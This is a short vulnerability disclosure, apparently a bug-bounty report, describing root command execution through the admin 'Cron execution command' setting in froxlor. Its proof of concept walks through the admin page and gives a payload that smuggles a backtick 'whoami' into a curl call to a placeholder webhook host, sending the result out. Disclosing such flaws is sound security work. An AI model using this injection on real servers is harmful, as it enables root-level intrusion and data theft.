Cron execution command field allows attackers with admin privilege to execute OS command as root in froxlor/froxlor
Dec 19th 2022
Cron execution commandvalue is written into cronfile without any security protection mechanism.
- If an attacker gained admin access, he/she can run OS command as root.
Proof of Concept
1/ Navigate to http://webserver/froxlor/admin_settings.php?page=overview&part=crond
2/ In the
Cron execution command field. Paste in a command following with a semicolon. For example:
curl http://<your webhook site>/`whoami`;
3/ Cronfile on the server is updated after some minutes
whoami command is executed and returned root user
If an attacker has admin access, he/she can execute OS command as root on the server.